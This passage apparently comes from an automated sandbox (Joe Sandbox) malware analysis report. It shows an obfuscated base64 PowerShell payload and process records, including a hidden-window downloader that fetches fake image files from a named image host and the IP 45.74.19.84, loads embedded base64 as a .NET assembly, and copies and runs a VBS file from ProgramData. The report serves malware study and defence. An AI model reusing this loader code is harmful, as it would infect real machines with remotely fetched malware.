DgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGMDgTrebgB2DgTreGgDgTreLwBLDgTreEoDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTrecgBlDgTreGQDgTrebgBvDgTreHcDgTrecwByDgTreGUDgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:21:13:50
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:21:13:51
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:21:13:58
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs
                                                                  Imagebase:0x7ff6e3d50000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:21:13:58
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff66e660000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:8
                                                                  Start time:21:14:08
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
                                                                  Imagebase:0x7ff60f410000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:21:14:16
                                                                  Start date:13/02/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs"
                                                                  Imagebase:0x7ff60f410000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Reset < >
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2714047990.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34890000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2184447465.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd348b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                    • Instruction ID: deb5d86c88e8f26112380754d293aded1f7c495d532cba5f2c16f698bcc23440
                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                    • Instruction Fuzzy Hash: E201A73020CB0C4FD744EF0CE051AA6B3E0FB89320F10052DE58AC3651DA36E882CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%